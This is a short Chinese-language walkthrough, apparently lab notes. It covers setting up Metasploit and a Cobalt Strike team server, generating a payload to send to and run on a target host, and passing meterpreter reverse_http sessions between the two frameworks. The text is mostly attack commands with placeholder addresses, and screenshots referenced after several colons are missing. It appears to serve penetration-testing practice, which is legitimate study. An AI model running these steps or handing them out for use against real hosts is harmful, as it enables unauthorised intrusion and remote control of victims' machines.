一、使用msfvenom
- kali系统默认有该软件,升级软件即可
sudo apt-get update && apt-get install metasploit-framework
2. 初始换数据库:
msfdb init
msfdb start
msfdb stop
- 运行软件
msfconsole
- 设置参数
use 0
set rhosts x.x.x.x #目标主机的地址
run
- 出现meterpreter表示成功,现在就可以在目标主机上执行命令:
二、安装部署Cobalt Strike服务端并使用客户端连接,并截屏
1. 部署
将server上传到kali:
设置权限
cd CobaltStrike4.9.1_Server
chmod 777 *
启动服务端,Ok@123456是密码可以根据需要进行修改,不要使用弱口令
nohup ./teamserver X.X.X.X Ok@123456 > teamserver.log 2>&1 &
运行客户端:
进入主界面:
2. 使用
设置监听器;
生成payload:
点击生成,并选择保持位置:
将生成的payload,发送给目标主机,并运行后,CS就可以收到对话:
进入交互模式;
执行目标主机命令:
三、msf和Cobalt Strike间的会话传递
1. CS->MSF
配置CS:
配置msf:
use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost x.x.x.x #CS的IP地址
set lport 4444 #和CS的端口一致
run
回到CS,右键会话-->凭证授权-->新建会话
此时,回到msf发现已经连接成功:
2. MSF->CS
配置CS监听器:
配置msf:
use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_http
set DisablePayloadHandler true
set session 1
set lhost x.x.x.x #这个地址写cs服务器的地址
set lport 8088 #和CS监听的端口一致
run
验证: